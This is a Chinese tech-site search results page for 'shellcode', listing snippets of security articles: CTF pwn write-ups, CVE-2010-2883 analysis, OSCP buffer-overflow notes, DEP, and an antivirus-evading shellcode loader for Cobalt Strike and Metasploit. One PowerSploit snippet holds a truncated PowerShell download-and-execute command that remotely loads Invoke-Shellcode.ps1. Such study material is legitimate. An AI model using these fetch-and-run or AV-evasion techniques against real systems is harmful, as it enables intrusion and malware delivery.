码迷,mamicode.com
首页 >  
搜索关键字:shellcode    ( 232个结果
8_InlineHook
1 shellcode低2Gb警告、应使用高2GB 稳定 :在内核挂钩子:由于每个进程的低2gb 的数据是不同的;所以 在内核挂钩子 因该把 代码 放在 高 2gb。方法1(申请):比如 使用前面的 ExAllocatePool(0,size);分配非分页内存,然后把shellcode 拷贝到 非分... ...
分类:其他好文   时间:2019-10-22 12:56:04    阅读次数:76
Pwn-level2
题目地址 https://dn.jarvisoj.com/challengefiles/level2.54931449c557d0551c4fc2a10f4778a1 先看一下文件的属性 32位 在看看保护机制 开启了NX 那么就不能shellcode 丢到IDA看看 main函数先执行vulner ...
分类:其他好文   时间:2019-10-08 20:31:19    阅读次数:123
《漏洞战争》- CVE-2010-2883(上)
综述 本文内容基于漏洞战争一书中对于漏洞CVE-2010-2883攻击样本的分析,在书中分析的基础上,本文着重展现漏洞利用过程中shellcode的执行过程,通过调试加深对漏洞利用过程的理解。 由于本文图片数量较多,所以分为上下两篇文章发布 由于博客图片显示不清楚,故给出高清原文下载链接: http ...
分类:其他好文   时间:2019-09-19 21:02:33    阅读次数:99
powersploit使用实例
一、AntivirusBypass(绕过杀毒) Find-AVSignature 发现杀软的签名 1、先在靶机(windows 2008)上远程加载位于win7的Invoke-Shellcode.ps1脚本 iex(New-Object Net.WebClient).DownloadString(" ...
分类:其他好文   时间:2019-08-30 16:00:03    阅读次数:86
内存运行PE文件
内存中运行文件 拿exe并在HxD或010中打开 cntrl+a copy as C 粘贴到encrypt.cpp 编译并运行encrypt.cpp 创建shellcode.txt 从shellcode.txt复制char数组,并替换runPE.cpp中的rawData [] 编译生成最终的runP ...
分类:其他好文   时间:2019-08-28 10:39:24    阅读次数:96
[源码]Python免杀ShellCode加载器(Cobaltstrike/Metasploit)
0x001 原理 采用分离法,即将ShellCode和加载器分离。方法较LOW但免杀。 本文主要将ShellCode转成HEX,再通过加载器执行ShellCode。 PS: 何为SC加载器,即专门用于加载所提供ShellCode的工具。 如同HTTP发包工具,支持提交HTTP,写死参数最多只能叫EX ...
分类:编程语言   时间:2019-07-21 23:59:09    阅读次数:404
DEP
一、原理 DEP - 数据执行保护的缩写,Data Execution Prevention。 他是一套软硬件技术,能够在内存上执行额外检查以帮助防止在系统上运行恶意代码。其基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就 ...
分类:其他好文   时间:2019-06-29 01:21:09    阅读次数:272
OSCP Learning Notes - Buffer Overflows(2)
Finding the Offset 1. Use the Metasploite pattern_create.rb tool to create 5900 characters. 2.Write the python test script. The shellcode is copied fr ...
分类:其他好文   时间:2019-06-27 01:09:07    阅读次数:143
ROP简单 ret2syscall
开启的NX保护 写shellcode 是不可能的,也没有system等函数 存在溢出,算下偏移 变量与bp的距离就等于0x60 这个变量的开栈是根据sp开的 他距离sp0x1c 所以偏移就是 bp-sp-0xc1 画个图吧 ESP| 0x1c |变量| |EBP| 如果就是寻找pop 我理解的这个r ...
分类:其他好文   时间:2019-06-12 23:04:39    阅读次数:121
Exp4 恶意代码分析 ——20164316张子遥
一、实践目标 1.监控你自己系统的运行状态,看有没有可疑的程序在运行。 2.分析一个恶意软件,就分析Exp2或Exp3中生成后门软件;分析工具尽量使用原生指令或sysinternals,systracer套件。 3.假定将来工作中你觉得自己的主机有问题,就可以用实验中的这个思路,先整个系统监控看能不 ...
分类:其他好文   时间:2019-04-07 00:24:45    阅读次数:232
232条   上一页 1 ... 5 6 7 8 9 ... 24 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!